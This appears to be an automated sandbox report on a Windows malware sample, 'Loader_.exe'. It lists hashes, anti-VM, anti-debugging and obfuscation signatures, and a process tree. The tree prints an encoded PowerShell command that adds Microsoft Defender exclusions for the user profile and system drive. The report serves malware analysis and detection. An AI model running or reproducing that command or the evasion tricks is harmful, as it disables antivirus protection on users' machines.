Analysis
-
max time kernel
40s -
max time network
37s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
15/07/2023, 22:34
Behavioral task
behavioral1
Sample
Loader_.exe
Resource
win7-20230712-en
General
-
Target
Loader_.exe
-
Size
21.0MB
-
MD5
5c68101e796d08e0f5a0c9f5bc78cc80
-
SHA1
d0c59230ffec87ae971b0cd1e8a3a5dc0628bb03
-
SHA256
b76df2a2fde219ca92c9a881fb7909392f65cea18e63f6402d991da8db4eabec
-
SHA512
e8bb3e3389c3f149fa34533667e5d86902521037d3b9a8d5bf95598be96f78365777ca76d614bbdc9361b35b9006b2b093a4a2f678064e093a5fbdfb3d2e917a
-
SSDEEP
393216:6wPBZ5c2iENnfa5v3InT8OSmJ8pzV24UwwSXSDvRIrFoXYj4aUWHe+QLIrssSCwQ:6uP3isnfa5f/mKZimkqrFoFaU3Ipxr
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Loader_.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Loader_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Loader_.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation Loader_.exe -
Executes dropped EXE 2 IoCs
pid Process 3712 compiled.exe 3776 OMM Loader.exe -
Obfuscated with Agile.Net obfuscator 3 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral2/files/0x00080000000231e9-145.dat agile_net behavioral2/files/0x00080000000231e9-169.dat agile_net behavioral2/files/0x00080000000231e9-171.dat agile_net -
resource yara_rule behavioral2/memory/4572-133-0x0000000000400000-0x0000000002772000-memory.dmp themida behavioral2/memory/4572-135-0x0000000000400000-0x0000000002772000-memory.dmp themida behavioral2/memory/4572-167-0x0000000000400000-0x0000000002772000-memory.dmp themida behavioral2/memory/4572-172-0x0000000000400000-0x0000000002772000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Loader_.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4572 Loader_.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3480 powershell.exe 3480 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3480 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4572 wrote to memory of 3480 4572 Loader_.exe 87 PID 4572 wrote to memory of 3480 4572 Loader_.exe 87 PID 4572 wrote to memory of 3480 4572 Loader_.exe 87 PID 4572 wrote to memory of 3712 4572 Loader_.exe 89 PID 4572 wrote to memory of 3712 4572 Loader_.exe 89 PID 4572 wrote to memory of 3712 4572 Loader_.exe 89 PID 3712 wrote to memory of 3776 3712 compiled.exe 90 PID 3712 wrote to memory of 3776 3712 compiled.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\Loader_.exe"C:\Users\Admin\AppData\Local\Temp\Loader_.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAYwBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAeQBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAdwB6ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
C:\Users\Admin\compiled.exe"C:\Users\Admin\compiled.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\Users\Admin\AppData\Local\Temp\compiled_40deecec-88bd-4a31-9e32-aec385e55c81\OMM Loader.exe"C:\Users\Admin\AppData\Local\Temp\compiled_40deecec-88bd-4a31-9e32-aec385e55c81\OMM Loader.exe"3⤵
- Executes dropped EXE
PID:3776
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
144KB
MD54b07d4daa90e051ca065e497c8d21346
SHA1248cce5809f7dbde17402ecb36bced1b071f9972
SHA25670795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA5120c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545
-
Filesize
144KB
MD54b07d4daa90e051ca065e497c8d21346
SHA1248cce5809f7dbde17402ecb36bced1b071f9972
SHA25670795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA5120c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545
-
Filesize
29.4MB
MD5b763ec0b17dcf0adc1416a900c4551ac
SHA17216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75
-
Filesize
29.4MB
MD5b763ec0b17dcf0adc1416a900c4551ac
SHA17216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75
-
Filesize
29.4MB
MD5b763ec0b17dcf0adc1416a900c4551ac
SHA17216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75